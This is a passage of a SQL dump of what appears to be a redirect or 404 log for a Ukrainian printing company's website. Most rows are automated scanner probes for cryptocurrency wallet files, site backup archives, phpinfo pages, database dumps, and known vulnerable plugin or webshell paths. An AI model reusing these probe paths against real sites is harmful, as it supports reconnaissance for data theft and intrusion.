00:00:00',301),(20536,'https://ekvatorprint.com.ua/ekvatorprint.com.ua.dat',NULL,'','',1,0,'2021-08-04 07:56:02','0000-00-00 00:00:00',301),(20537,'https://ekvatorprint.com.ua/ekvatorprint.dat',NULL,'','',1,0,'2021-08-04 07:56:07','0000-00-00 00:00:00',301),(20538,'https://ekvatorprint.com.ua/ekvatorprint_wallet.zip',NULL,'','',1,0,'2021-08-04 07:56:12','0000-00-00 00:00:00',301),(20539,'https://ekvatorprint.com.ua/ekvatorprint.com.ua_wallet.dat',NULL,'','',1,0,'2021-08-04 07:56:16','0000-00-00 00:00:00',301),(20540,'https://ekvatorprint.com.ua/ekvatorprint.com.ua_wallet.zip',NULL,'','',1,0,'2021-08-04 07:56:20','0000-00-00 00:00:00',301),(20541,'https://ekvatorprint.com.ua/ekvatorprint_wallet.dat',NULL,'','',1,0,'2021-08-04 07:56:27','0000-00-00 00:00:00',301),(20542,'https://ekvatorprint.com.ua/bitcoin_wallet.zip',NULL,'','',1,0,'2021-08-04 07:56:35','0000-00-00 00:00:00',301),(20543,'https://ekvatorprint.com.ua/wallet_backup.zip',NULL,'','',1,0,'2021-08-04 07:56:46','0000-00-00 00:00:00',301),(20544,'https://ekvatorprint.com.ua/bitcoin.zip',NULL,'','',1,0,'2021-08-04 07:57:22','0000-00-00 00:00:00',301),(20545,'https://ekvatorprint.com.ua/backup.dat.1',NULL,'','',1,0,'2021-08-04 07:57:37','0000-00-00 00:00:00',301),(20546,'https://ekvatorprint.com.ua/bitcoin.dat.1',NULL,'','',1,0,'2021-08-04 07:57:48','0000-00-00 00:00:00',301),(20547,'https://ekvatorprint.com.ua/wallet.dat.1',NULL,'','',1,0,'2021-08-04 07:57:55','0000-00-00 00:00:00',301),(20548,'https://ekvatorprint.com.ua/wallet_backup.dat.1',NULL,'','',1,0,'2021-08-04 07:58:20','0000-00-00 00:00:00',301),(20549,'https://ekvatorprint.com.ua/wallet.zip',NULL,'','',1,0,'2021-08-04 07:58:33','0000-00-00 00:00:00',301),(20550,'https://ekvatorprint.com.ua/bitcoin_wallet.dat.1',NULL,'','',1,0,'2021-08-04 07:59:06','0000-00-00 00:00:00',301),(20551,'https://ekvatorprint.com.ua/ekvatorprint.com.ua.dat.1',NULL,'','',1,0,'2021-08-04 08:00:48','0000-00-00 00:00:00',301),(20552,'https://ekvatorprint.com.ua/ekvatorprint_wallet.dat.1',NULL,'','',1,0,'2021-08-04 08:01:26','0000-00-00 00:00:00',301),(20553,'https://ekvatorprint.com.ua/ekvatorprint.com.ua_wallet.dat.1',NULL,'','',1,0,'2021-08-04 08:02:32','0000-00-00 00:00:00',301),(20554,'https://ekvatorprint.com.ua/ekvatorprint.dat.1',NULL,'','',1,0,'2021-08-04 08:02:41','0000-00-00 00:00:00',301),(20555,'https://ekvatorprint.com.ua/wp-content/plugins/dzs-zoomsounds/savepng.php',NULL,'','',25,0,'2021-08-05 07:15:18','0000-00-00 00:00:00',301),(20556,'https://ekvatorprint.com.ua/wp-admin/css/',NULL,'binance.com','',224,0,'2021-08-05 13:30:35','0000-00-00 00:00:00',301),(20557,'https://ekvatorprint.com.ua/sites/default/files/',NULL,'binance.com','',222,0,'2021-08-05 13:31:47','0000-00-00 00:00:00',301),(20558,'https://ekvatorprint.com.ua/admin/controller/extension/extension/',NULL,'binance.com','',221,0,'2021-08-05 13:32:25','0000-00-00 00:00:00',301),(20559,'https://ekvatorprint.com.ua/bc',NULL,'http://ekvatorprint.com.ua/bc','',22,0,'2021-08-06 12:49:50','0000-00-00 00:00:00',301),(20560,'https://ekvatorprint.com.ua/bk',NULL,'http://ekvatorprint.com.ua/bk','',22,0,'2021-08-06 12:49:51','0000-00-00 00:00:00',301),(20561,'https://ekvatorprint.com.ua/main',NULL,'http://ekvatorprint.com.ua/main','',28,0,'2021-08-06 12:49:52','0000-00-00 00:00:00',301),(20562,'https://ekvatorprint.com.ua/media/jui/js/jquery.min.js?acf16b57b327875815ebef44adc986e1',NULL,'https://ekvatorprint.com.ua/printing-on-canvas','',11,0,'2021-08-07 07:23:42','0000-00-00 00:00:00',301),(20563,'https://ekvatorprint.com.ua/file:/c:/users/4227~1/appdata/local/temp/website auditor/владелец/tmpreports/6e057178/highlight-css.css',NULL,'','',1,0,'2021-08-09 07:05:48','0000-00-00 00:00:00',301),(20564,'https://ekvatorprint.com.ua/file:/c:/users/4227~1/appdata/local/temp/website auditor/владелец/tmpreports/70a25452/highlight-css.css',NULL,'','',1,0,'2021-08-09 10:36:19','0000-00-00 00:00:00',301),(20565,'https://ekvatorprint.com.ua/wp-admin/css/ie.css',NULL,'','',2,0,'2021-08-10 05:39:54','0000-00-00 00:00:00',301),(20566,'https://ekvatorprint.com.ua/wp-content/plugins/advanced_file_manager_5/files/_elghoul.php?0=up',NULL,'','',2,0,'2021-08-10 08:50:23','0000-00-00 00:00:00',301),(20567,'https://ekvatorprint.com.ua/delivery/mailto:e@ekvatorprint.com.ua',NULL,'','',1,0,'2021-08-11 02:40:05','0000-00-00 00:00:00',301),(20568,'https://ekvatorprint.com.ua/contacts/mailto:e@ekvatorprint.com.ua',NULL,'','',6,0,'2021-08-11 02:40:11','0000-00-00 00:00:00',301),(20569,'https://ekvatorprint.com.ua/trebovaniya/mailto:e@ekvatorprint.com.ua',NULL,'','',1,0,'2021-08-11 02:40:41','0000-00-00 00:00:00',301),(20570,'https://ekvatorprint.com.ua/video/mailto:e@ekvatorprint.com.ua',NULL,'','',1,0,'2021-08-11 02:40:42','0000-00-00 00:00:00',301),(20571,'https://ekvatorprint.com.ua/banner-printing/mailto:e@ekvatorprint.com.ua',NULL,'','',1,0,'2021-08-11 02:40:43','0000-00-00 00:00:00',301),(20572,'https://ekvatorprint.com.ua/wp-includes/upload_index.php?auth=f02pz3831w0dttlgq26l',NULL,'','',2,0,'2021-08-11 17:49:23','0000-00-00 00:00:00',301),(20573,'https://ekvatorprint.com.ua/__media__/js/netsoltrademark.php?d=ydbh4mfw3v.com',NULL,'','',1,0,'2021-08-13 05:39:07','0000-00-00 00:00:00',301),(20574,'https://ekvatorprint.com.ua/libraries/windwalker/src/elfinder/connect/connector.minimal.php',NULL,'','',1,0,'2021-08-13 09:02:54','0000-00-00 00:00:00',301),(20575,'https://ekvatorprint.com.ua/wp-content/uploads/upload_index.php?auth=f02pz3831w0dttlgq26l',NULL,'','',2,0,'2021-08-14 01:15:18','0000-00-00 00:00:00',301),(20576,'https://ekvatorprint.com.ua/phpinfo',NULL,'','',59,0,'2021-08-14 03:45:36','0000-00-00 00:00:00',301),(20577,'https://ekvatorprint.com.ua/phpinfo.php',NULL,'','',67,0,'2021-08-14 03:45:36','0000-00-00 00:00:00',301),(20578,'https://ekvatorprint.com.ua/adminer.sql',NULL,'','',3,0,'2021-08-14 18:39:47','0000-00-00 00:00:00',301),(20579,'https://ekvatorprint.com.ua/configuration',NULL,'','',3,0,'2021-08-14 19:50:55','0000-00-00 00:00:00',301),(20580,'https://ekvatorprint.com.ua/trebovaniya вот это то что нам давала аня',NULL,'','',1,0,'2021-08-17 13:21:51','0000-00-00 00:00:00',301),(20581,'https://ekvatorprint.com.ua/cache/medianity/ssi_examples/cart_action.php',NULL,'','',1,0,'2021-08-22 21:02:53','0000-00-00 00:00:00',301),(20582,'https://ekvatorprint.com.ua/wp-admin/upload_index.php?auth=f02pz3831w0dttlgq26l',NULL,'','',1,0,'2021-08-25 03:30:23','0000-00-00 00:00:00',301),(20583,'https://ekvatorprint.com.ua/wp-content/plugins/ioptimizations/ioptimizes.php?hamlorszd=',NULL,'','',1,0,'2021-08-26 01:46:13','0000-00-00 00:00:00',301),(20584,'https://ekvatorprint.com.ua/ekvatorprint_com_ua.zip',NULL,'http://ekvatorprint.com.ua/ekvatorprint_com_ua.zip','',1,0,'2021-08-26 16:04:04','0000-00-00 00:00:00',301),(20585,'https://ekvatorprint.com.ua/public_html.zip',NULL,'http://ekvatorprint.com.ua/public_html.zip','',3,0,'2021-08-26 16:14:53','0000-00-00 00:00:00',301),(20586,'https://ekvatorprint.com.ua/archive.zip',NULL,'http://ekvatorprint.com.ua/archive.zip','',2,0,'2021-08-26 16:36:26','0000-00-00 00:00:00',301),(20587,'https://ekvatorprint.com.ua/var.zip',NULL,'http://ekvatorprint.com.ua/var.zip','',2,0,'2021-08-26 17:08:49','0000-00-00 00:00:00',301),(20588,'https://ekvatorprint.com.ua/blog.zip',NULL,'http://ekvatorprint.com.ua/blog.zip','',2,0,'2021-08-26 17:19:47','0000-00-00 00:00:00',301),(20589,'https://ekvatorprint.com.ua/html.zip',NULL,'http://ekvatorprint.com.ua/html.zip','',1,0,'2021-08-26 17:30:25','0000-00-00 00:00:00',301),(20590,'https://ekvatorprint.com.ua/data.zip',NULL,'http://ekvatorprint.com.ua/data.zip','',2,0,'2021-08-26 17:41:09','0000-00-00 00:00:00',301),(20591,'https://ekvatorprint.com.ua/forum.zip',NULL,'http://ekvatorprint.com.ua/forum.zip','',1,0,'2021-08-26 17:51:53','0000-00-00 00:00:00',301),(20592,'https://ekvatorprint.com.ua/new.zip',NULL,'http://ekvatorprint.com.ua/new.zip','',2,0,'2021-08-26 18:02:22','0000-00-00 00:00:00',301),(20593,'https://ekvatorprint.com.ua/application.zip',NULL,'http://ekvatorprint.com.ua/application.zip','',1,0,'2021-08-26 18:12:52','0000-00-00 00:00:00',301),(20594,'https://ekvatorprint.com.ua/app.zip',NULL,'http://ekvatorprint.com.ua/app.zip','',2,0,'2021-08-26 18:23:40','0000-00-00 00:00:00',301),(20595,'https://ekvatorprint.com.ua/home.zip',NULL,'http://ekvatorprint.com.ua/home.zip','',6,0,'2021-08-26 18:34:24','0000-00-00 00:00:00',301),(20596,'https://ekvatorprint.com.ua/old.zip',NULL,'http://ekvatorprint.com.ua/old.zip','',2,0,'2021-08-26 18:45:09','0000-00-00 00:00:00',301),(20597,'https://ekvatorprint.com.ua/engine.zip',NULL,'http://ekvatorprint.com.ua/engine.zip','',1,0,'2021-08-26 18:55:56','0000-00-00 00:00:00',301),(20598,'https://ekvatorprint.com.ua/private_html.zip',NULL,'http://ekvatorprint.com.ua/private_html.zip','',1,0,'2021-08-26 19:28:28','0000-00-00 00:00:00',301),(20599,'https://ekvatorprint.com.ua/dev.zip',NULL,'http://ekvatorprint.com.ua/dev.zip','',2,0,'2021-08-26 19:49:50','0000-00-00 00:00:00',301),(20600,'https://ekvatorprint.com.ua/test.zip',NULL,'http://ekvatorprint.com.ua/test.zip','',2,0,'2021-08-26 20:00:38','0000-00-00 00:00:00',301),(20601,'https://ekvatorprint.com.ua/site.zip',NULL,'http://ekvatorprint.com.ua/site.zip','',4,0,'2021-08-26 20:11:24','0000-00-00 00:00:00',301),(20602,'https://ekvatorprint.com.ua/bcp.zip',NULL,'http://ekvatorprint.com.ua/bcp.zip','',1,0,'2021-08-26 20:22:06','0000-00-00 00:00:00',301),(20603,'https://ekvatorprint.com.ua/111.zip',NULL,'http://ekvatorprint.com.ua/111.zip','',1,0,'2021-08-26 20:43:19','0000-00-00 00:00:00',301),(20604,'https://ekvatorprint.com.ua/www-root.zip',NULL,'http://ekvatorprint.com.ua/www-root.zip','',1,0,'2021-08-26 21:04:56','0000-00-00 00:00:00',301),(20605,'https://ekvatorprint.com.ua/root.zip',NULL,'http://ekvatorprint.com.ua/root.zip','',1,0,'2021-08-26 21:15:55','0000-00-00 00:00:00',301),(20606,'https://ekvatorprint.com.ua/arch.zip',NULL,'http://ekvatorprint.com.ua/arch.zip','',1,0,'2021-08-26 21:26:27','0000-00-00 00:00:00',301),(20607,'https://ekvatorprint.com.ua/0.zip',NULL,'http://ekvatorprint.com.ua/0.zip','',1,0,'2021-08-26 21:37:11','0000-00-00 00:00:00',301),(20608,'https://ekvatorprint.com.ua/backend.zip',NULL,'http://ekvatorprint.com.ua/backend.zip','',1,0,'2021-08-26 21:47:51','0000-00-00 00:00:00',301),(20609,'https://ekvatorprint.com.ua/frontend.zip',NULL,'http://ekvatorprint.com.ua/frontend.zip','',1,0,'2021-08-26 21:58:07','0000-00-00 00:00:00',301),(20610,'https://ekvatorprint.com.ua/bkp.zip',NULL,'http://ekvatorprint.com.ua/bkp.zip','',2,0,'2021-08-26 22:08:44','0000-00-00 00:00:00',301),(20611,'https://ekvatorprint.com.ua/production.zip',NULL,'http://ekvatorprint.com.ua/production.zip','',1,0,'2021-08-26 22:19:08','0000-00-00 00:00:00',301),(20612,'https://ekvatorprint.com.ua/prod.zip',NULL,'http://ekvatorprint.com.ua/prod.zip','',1,0,'2021-08-26 22:29:39','0000-00-00 00:00:00',301),(20613,'https://ekvatorprint.com.ua/save.zip',NULL,'http://ekvatorprint.com.ua/save.zip','',1,0,'2021-08-26 22:40:06','0000-00-00 00:00:00',301),(20614,'https://ekvatorprint.com.ua/control_panel.zip',NULL,'http://ekvatorprint.com.ua/control_panel.zip','',1,0,'2021-08-26 22:50:39','0000-00-00 00:00:00',301),(20615,'https://ekvatorprint.com.ua/httpdocs.zip',NULL,'http://ekvatorprint.com.ua/httpdocs.zip','',1,0,'2021-08-26 23:01:13','0000-00-00 00:00:00',301),(20616,'https://ekvatorprint.com.ua/htdocs.zip',NULL,'http://ekvatorprint.com.ua/htdocs.zip','',5,0,'2021-08-26 23:11:39','0000-00-00 00:00:00',301),(20617,'https://ekvatorprint.com.ua/deploy.zip',NULL,'http://ekvatorprint.com.ua/deploy.zip','',1,0,'2021-08-26 23:22:06','0000-00-00 00:00:00',301),(20618,'https://ekvatorprint.com.ua/include.zip',NULL,'http://ekvatorprint.com.ua/include.zip','',3,0,'2021-08-26 23:32:38','0000-00-00 00:00:00',301),(20619,'https://ekvatorprint.com.ua/inc.zip',NULL,'http://ekvatorprint.com.ua/inc.zip','',3,0,'2021-08-26 23:43:07','0000-00-00 00:00:00',301),(20620,'https://ekvatorprint.com.ua/lib.zip',NULL,'http://ekvatorprint.com.ua/lib.zip','',1,0,'2021-08-26 23:53:36','0000-00-00 00:00:00',301),(20621,'https://ekvatorprint.com.ua/sites.zip',NULL,'http://ekvatorprint.com.ua/sites.zip','',1,0,'2021-08-27 00:04:05','0000-00-00 00:00:00',301),(20622,'https://ekvatorprint.com.ua/local.zip',NULL,'http://ekvatorprint.com.ua/local.zip','',1,0,'2021-08-27 00:15:00','0000-00-00 00:00:00',301),(20623,'https://ekvatorprint.com.ua/last.zip',NULL,'http://ekvatorprint.com.ua/last.zip','',1,0,'2021-08-27 00:25:42','0000-00-00 00:00:00',301),(20624,'https://ekvatorprint.com.ua/articles.zip',NULL,'http://ekvatorprint.com.ua/articles.zip','',1,0,'2021-08-27 00:36:27','0000-00-00 00:00:00',301),(20625,'https://ekvatorprint.com.ua/panel.zip',NULL,'http://ekvatorprint.com.ua/panel.zip','',1,0,'2021-08-27 00:47:15','0000-00-00 00:00:00',301),(20626,'https://ekvatorprint.com.ua/user.zip',NULL,'http://ekvatorprint.com.ua/user.zip','',1,0,'2021-08-27 00:58:02','0000-00-00 00:00:00',301),(20627,'https://ekvatorprint.com.ua/cabinet.zip',NULL,'http://ekvatorprint.com.ua/cabinet.zip','',1,0,'2021-08-27 01:08:44','0000-00-00 00:00:00',301),(20628,'https://ekvatorprint.com.ua/ekvatorprint.com.ua.tar.gz',NULL,'http://ekvatorprint.com.ua/ekvatorprint.com.ua.tar.gz','',7,0,'2021-08-27 01:30:16','0000-00-00 00:00:00',301),(20629,'https://ekvatorprint.com.ua/ekvatorprintcomua.tar.gz',NULL,'http://ekvatorprint.com.ua/ekvatorprintcomua.tar.gz','',1,0,'2021-08-27 01:41:05','0000-00-00 00:00:00',301),(20630,'https://ekvatorprint.com.ua/ekvatorprint_com_ua.tar.gz',NULL,'http://ekvatorprint.com.ua/ekvatorprint_com_ua.tar.gz','',1,0,'2021-08-27 01:52:05','0000-00-00 00:00:00',301),(20631,'https://ekvatorprint.com.ua/public_html.tar.gz',NULL,'http://ekvatorprint.com.ua/public_html.tar.gz','',3,0,'2021-08-27 02:02:58','0000-00-00 00:00:00',301),(20632,'https://ekvatorprint.com.ua/archive.tar.gz',NULL,'http://ekvatorprint.com.ua/archive.tar.gz','',2,0,'2021-08-27 02:24:12','0000-00-00 00:00:00',301),(20633,'https://ekvatorprint.com.ua/www.tar.gz',NULL,'http://ekvatorprint.com.ua/www.tar.gz','',4,0,'2021-08-27 02:45:52','0000-00-00 00:00:00',301),(20634,'https://ekvatorprint.com.ua/var.tar.gz',NULL,'http://ekvatorprint.com.ua/var.tar.gz','',2,0,'2021-08-27 02:56:40','0000-00-00 00:00:00',301),(20635,'https://ekvatorprint.com.ua/html.tar.gz',NULL,'http://ekvatorprint.com.ua/html.tar.gz','',1,0,'2021-08-27 03:18:10','0000-00-00 00:00:00',301),(20636,'https://ekvatorprint.com.ua/data.tar.gz',NULL,'http://ekvatorprint.com.ua/data.tar.gz','',2,0,'2021-08-27 03:29:00','0000-00-00 00:00:00',301),(20637,'https://ekvatorprint.com.ua/forum.tar.gz',NULL,'http://ekvatorprint.com.ua/forum.tar.gz','',1,0,'2021-08-27 03:39:46','0000-00-00 00:00:00',301),(20638,'https://ekvatorprint.com.ua/new.tar.gz',NULL,'http://ekvatorprint.com.ua/new.tar.gz','',2,0,'2021-08-27 03:50:38','0000-00-00 00:00:00',301),(20639,'https://ekvatorprint.com.ua/application.tar.gz',NULL,'http://ekvatorprint.com.ua/application.tar.gz','',1,0,'2021-08-27 04:01:23','0000-00-00 00:00:00',301),(20640,'https://ekvatorprint.com.ua/app.tar.gz',NULL,'http://ekvatorprint.com.ua/app.tar.gz','',2,0,'2021-08-27 04:12:08','0000-00-00 00:00:00',301),(20641,'https://ekvatorprint.com.ua/home.tar.gz',NULL,'http://ekvatorprint.com.ua/home.tar.gz','',7,0,'2021-08-27 04:23:02','0000-00-00 00:00:00',301),(20642,'https://ekvatorprint.com.ua/old.tar.gz',NULL,'http://ekvatorprint.com.ua/old.tar.gz','',2,0,'2021-08-27 04:33:24','0000-00-00 00:00:00',301),(20643,'https://ekvatorprint.com.ua/engine.tar.gz',NULL,'http://ekvatorprint.com.ua/engine.tar.gz','',1,0,'2021-08-27 04:43:57','0000-00-00 00:00:00',301),(20644,'https://ekvatorprint.com.ua/shop.tar.gz',NULL,'http://ekvatorprint.com.ua/shop.tar.gz','',1,0,'2021-08-27 05:05:33','0000-00-00 00:00:00',301),(20645,'https://ekvatorprint.com.ua/private_html.tar.gz',NULL,'http://ekvatorprint.com.ua/private_html.tar.gz','',1,0,'2021-08-27 05:16:22','0000-00-00 00:00:00',301),(20646,'https://ekvatorprint.com.ua/dev.tar.gz',NULL,'http://ekvatorprint.com.ua/dev.tar.gz','',2,0,'2021-08-27 05:37:54','0000-00-00 00:00:00',301),(20647,'https://ekvatorprint.com.ua/test.tar.gz',NULL,'http://ekvatorprint.com.ua/test.tar.gz','',2,0,'2021-08-27 05:48:38','0000-00-00 00:00:00',301),(20648,'https://ekvatorprint.com.ua/site.tar.gz',NULL,'http://ekvatorprint.com.ua/site.tar.gz','',4,0,'2021-08-27 05:59:10','0000-00-00 00:00:00',301),(20649,'https://ekvatorprint.com.ua/bcp.tar.gz',NULL,'http://ekvatorprint.com.ua/bcp.tar.gz','',1,0,'2021-08-27 06:09:52','0000-00-00 00:00:00',301),(20650,'https://ekvatorprint.com.ua/111.tar.gz',NULL,'http://ekvatorprint.com.ua/111.tar.gz','',1,0,'2021-08-27 06:31:30','0000-00-00 00:00:00',301),(20651,'https://ekvatorprint.com.ua/wwwroot.tar.gz',NULL,'http://ekvatorprint.com.ua/wwwroot.tar.gz','',1,0,'2021-08-27 06:42:07','0000-00-00 00:00:00',301),(20652,'https://ekvatorprint.com.ua/www-root.tar.gz',NULL,'http://ekvatorprint.com.ua/www-root.tar.gz','',1,0,'2021-08-27 06:52:56','0000-00-00 00:00:00',301),(20653,'https://ekvatorprint.com.ua/root.tar.gz',NULL,'http://ekvatorprint.com.ua/root.tar.gz','',1,0,'2021-08-27 07:03:41','0000-00-00 00:00:00',301),(20654,'https://ekvatorprint.com.ua/arch.tar.gz',NULL,'http://ekvatorprint.com.ua/arch.tar.gz','',1,0,'2021-08-27 07:14:26','0000-00-00 00:00:00',301),(20655,'https://ekvatorprint.com.ua/0.tar.gz',NULL,'http://ekvatorprint.com.ua/0.tar.gz','',1,0,'2021-08-27 07:25:18','0000-00-00 00:00:00',301),(20656,'https://ekvatorprint.com.ua/backend.tar.gz',NULL,'http://ekvatorprint.com.ua/backend.tar.gz','',1,0,'2021-08-27 07:35:57','0000-00-00 00:00:00',301),(20657,'https://ekvatorprint.com.ua/frontend.tar.gz',NULL,'http://ekvatorprint.com.ua/frontend.tar.gz','',1,0,'2021-08-27 07:46:44','0000-00-00 00:00:00',301),(20658,'https://ekvatorprint.com.ua/bkp.tar.gz',NULL,'http://ekvatorprint.com.ua/bkp.tar.gz','',2,0,'2021-08-27 07:57:44','0000-00-00 00:00:00',301),(20659,'https://ekvatorprint.com.ua/production.tar.gz',NULL,'http://ekvatorprint.com.ua/production.tar.gz','',1,0,'2021-08-27 08:08:20','0000-00-00 00:00:00',301),(20660,'https://ekvatorprint.com.ua/prod.tar.gz',NULL,'http://ekvatorprint.com.ua/prod.tar.gz','',1,0,'2021-08-27 08:19:01','0000-00-00 00:00:00',301),(20661,'https://ekvatorprint.com.ua/save.tar.gz',NULL,'http://ekvatorprint.com.ua/save.tar.gz','',1,0,'2021-08-27 08:29:33','0000-00-00 00:00:00',301),(20662,'https://ekvatorprint.com.ua/control_panel.tar.gz',NULL,'http://ekvatorprint.com.ua/control_panel.tar.gz','',1,0,'2021-08-27 08:40:21','0000-00-00 00:00:00',301),(20663,'https://ekvatorprint.com.ua/httpdocs.tar.gz',NULL,'http://ekvatorprint.com.ua/httpdocs.tar.gz','',1,0,'2021-08-27 08:51:16','0000-00-00 00:00:00',301),(20664,'https://ekvatorprint.com.ua/htdocs.tar.gz',NULL,'http://ekvatorprint.com.ua/htdocs.tar.gz','',5,0,'2021-08-27 09:01:53','0000-00-00 00:00:00',301),(20665,'https://ekvatorprint.com.ua/deploy.tar.gz',NULL,'http://ekvatorprint.com.ua/deploy.tar.gz','',1,0,'2021-08-27 09:12:42','0000-00-00 00:00:00',301),(20666,'https://ekvatorprint.com.ua/include.tar.gz',NULL,'http://ekvatorprint.com.ua/include.tar.gz','',3,0,'2021-08-27 09:23:24','0000-00-00 00:00:00',301),(20667,'https://ekvatorprint.com.ua/inc.tar.gz',NULL,'http://ekvatorprint.com.ua/inc.tar.gz','',3,0,'2021-08-27 09:34:16','0000-00-00 00:00:00',301),(20668,'https://ekvatorprint.com.ua/lib.tar.gz',NULL,'http://ekvatorprint.com.ua/lib.tar.gz','',1,0,'2021-08-27 09:44:54','0000-00-00 00:00:00',301),(20669,'https://ekvatorprint.com.ua/ekvatorprint.com.ua.tgz',NULL,'http://ekvatorprint.com.ua/ekvatorprint.com.ua.tgz','',3,0,'2021-08-27 10:08:59','0000-00-00 00:00:00',301),(20670,'https://ekvatorprint.com.ua/ekvatorprintcomua.tgz',NULL,'http://ekvatorprint.com.ua/ekvatorprintcomua.tgz','',1,0,'2021-08-27 10:19:46','0000-00-00 00:00:00',301),(20671,'https://ekvatorprint.com.ua/ekvatorprint_com_ua.tgz',NULL,'http://ekvatorprint.com.ua/ekvatorprint_com_ua.tgz','',1,0,'2021-08-27 10:30:33','0000-00-00 00:00:00',301),(20672,'https://ekvatorprint.com.ua/public_html.tgz',NULL,'http://ekvatorprint.com.ua/public_html.tgz','',3,0,'2021-08-27 10:41:20','0000-00-00 00:00:00',301),(20673,'https://ekvatorprint.com.ua/backup.tgz',NULL,'http://ekvatorprint.com.ua/backup.tgz','',4,0,'2021-08-27 10:52:01','0000-00-00 00:00:00',301),(20674,'https://ekvatorprint.com.ua/archive.tgz',NULL,'http://ekvatorprint.com.ua/archive.tgz','',2,0,'2021-08-27 11:02:44','0000-00-00 00:00:00',301),(20675,'https://ekvatorprint.com.ua/www.tgz',NULL,'http://ekvatorprint.com.ua/www.tgz','',4,0,'2021-08-27 11:24:20','0000-00-00 00:00:00',301),(20676,'https://ekvatorprint.com.ua/var.tgz',NULL,'http://ekvatorprint.com.ua/var.tgz','',1,0,'2021-08-27 11:35:04','0000-00-00 00:00:00',301),(20677,'https://ekvatorprint.com.ua/blog.tgz',NULL,'http://ekvatorprint.com.ua/blog.tgz','',1,0,'2021-08-27 11:46:02','0000-00-00 00:00:00',301),(20678,'https://ekvatorprint.com.ua/html.tgz',NULL,'http://ekvatorprint.com.ua/html.tgz','',1,0,'2021-08-27 11:56:36','0000-00-00 00:00:00',301),(20679,'https://ekvatorprint.com.ua/data.tgz',NULL,'http://ekvatorprint.com.ua/data.tgz','',1,0,'2021-08-27 12:07:18','0000-00-00 00:00:00',301),(20680,'https://ekvatorprint.com.ua/forum.tgz',NULL,'http://ekvatorprint.com.ua/forum.tgz','',1,0,'2021-08-27 12:18:04','0000-00-00 00:00:00',301),(20681,'https://ekvatorprint.com.ua/new.tgz',NULL,'http://ekvatorprint.com.ua/new.tgz','',1,0,'2021-08-27 12:28:51','0000-00-00 00:00:00',301),(20682,'https://ekvatorprint.com.ua/application.tgz',NULL,'http://ekvatorprint.com.ua/application.tgz','',1,0,'2021-08-27 12:39:47','0000-00-00 00:00:00',301),(20683,'https://ekvatorprint.com.ua/app.tgz',NULL,'http://ekvatorprint.com.ua/app.tgz','',1,0,'2021-08-27 12:50:15','0000-00-00 00:00:00',301),(20684,'https://ekvatorprint.com.ua/home.tgz',NULL,'http://ekvatorprint.com.ua/home.tgz','',6,0,'2021-08-27 13:00:58','0000-00-00 00:00:00',301),(20685,'https://ekvatorprint.com.ua/old.tgz',NULL,'http://ekvatorprint.com.ua/old.tgz','',1,0,'2021-08-27 13:11:45','0000-00-00 00:00:00',301),(20686,'https://ekvatorprint.com.ua/engine.tgz',NULL,'http://ekvatorprint.com.ua/engine.tgz','',1,0,'2021-08-27 13:22:31','0000-00-00 00:00:00',301),(20687,'https://ekvatorprint.com.ua/shop.tgz',NULL,'http://ekvatorprint.com.ua/shop.tgz','',1,0,'2021-08-27 13:44:03','0000-00-00 00:00:00',301),(20688,'https://ekvatorprint.com.ua/private_html.tgz',NULL,'http://ekvatorprint.com.ua/private_html.tgz','',1,0,'2021-08-27 13:54:49','0000-00-00 00:00:00',301),(20689,'https://ekvatorprint.com.ua/dev.tgz',NULL,'http://ekvatorprint.com.ua/dev.tgz','',1,0,'2021-08-27 14:16:20','0000-00-00 00:00:00',301),(20690,'https://ekvatorprint.com.ua/test.tgz',NULL,'http://ekvatorprint.com.ua/test.tgz','',1,0,'2021-08-27 14:27:10','0000-00-00 00:00:00',301),(20691,'https://ekvatorprint.com.ua/site.tgz',NULL,'http://ekvatorprint.com.ua/site.tgz','',3,0,'2021-08-27 14:37:52','0000-00-00 00:00:00',301),(20692,'https://ekvatorprint.com.ua/bcp.tgz',NULL,'http://ekvatorprint.com.ua/bcp.tgz','',1,0,'2021-08-27 14:48:45','0000-00-00 00:00:00',301),(20693,'https://ekvatorprint.com.ua/111.tgz',NULL,'http://ekvatorprint.com.ua/111.tgz','',1,0,'2021-08-27 15:10:00','0000-00-00 00:00:00',301),(20694,'https://ekvatorprint.com.ua/wwwroot.tgz',NULL,'http://ekvatorprint.com.ua/wwwroot.tgz','',1,0,'2021-08-27 15:20:48','0000-00-00 00:00:00',301),(20695,'https://ekvatorprint.com.ua/www-root.tgz',NULL,'http://ekvatorprint.com.ua/www-root.tgz','',1,0,'2021-08-27 15:31:38','0000-00-00 00:00:00',301),(20696,'https://ekvatorprint.com.ua/root.tgz',NULL,'http://ekvatorprint.com.ua/root.tgz','',1,0,'2021-08-27 15:42:15','0000-00-00 00:00:00',301),(20697,'https://ekvatorprint.com.ua/arch.tgz',NULL,'http://ekvatorprint.com.ua/arch.tgz','',1,0,'2021-08-27 15:52:59','0000-00-00 00:00:00',301),(20698,'https://ekvatorprint.com.ua/0.tgz',NULL,'http://ekvatorprint.com.ua/0.tgz','',1,0,'2021-08-27 16:03:30','0000-00-00 00:00:00',301),(20699,'https://ekvatorprint.com.ua/backend.tgz',NULL,'http://ekvatorprint.com.ua/backend.tgz','',1,0,'2021-08-27 16:14:17','0000-00-00 00:00:00',301),(20700,'https://ekvatorprint.com.ua/frontend.tgz',NULL,'http://ekvatorprint.com.ua/frontend.tgz','',1,0,'2021-08-27 16:25:04','0000-00-00 00:00:00',301),(20701,'https://ekvatorprint.com.ua/bkp.tgz',NULL,'http://ekvatorprint.com.ua/bkp.tgz','',1,0,'2021-08-27 16:35:45','0000-00-00 00:00:00',301),(20702,'https://ekvatorprint.com.ua/production.tgz',NULL,'http://ekvatorprint.com.ua/production.tgz','',1,0,'2021-08-27 16:46:32','0000-00-00 00:00:00',301),(20703,'https://ekvatorprint.com.ua/prod.tgz',NULL,'http://ekvatorprint.com.ua/prod.tgz','',1,0,'2021-08-27 16:57:18','0000-00-00 00:00:00',301),(20704,'https://ekvatorprint.com.ua/save.tgz',NULL,'http://ekvatorprint.com.ua/save.tgz','',1,0,'2021-08-27 17:07:56','0000-00-00 00:00:00',301),(20705,'https://ekvatorprint.com.ua/control_panel.tgz',NULL,'http://ekvatorprint.com.ua/control_panel.tgz','',1,0,'2021-08-27 17:18:42','0000-00-00 00:00:00',301),(20706,'https://ekvatorprint.com.ua/httpdocs.tgz',NULL,'http://ekvatorprint.com.ua/httpdocs.tgz','',1,0,'2021-08-27 17:29:30','0000-00-00 00:00:00',301),(20707,'https://ekvatorprint.com.ua/htdocs.tgz',NULL,'http://ekvatorprint.com.ua/htdocs.tgz','',1,0,'2021-08-27 17:40:18','0000-00-00 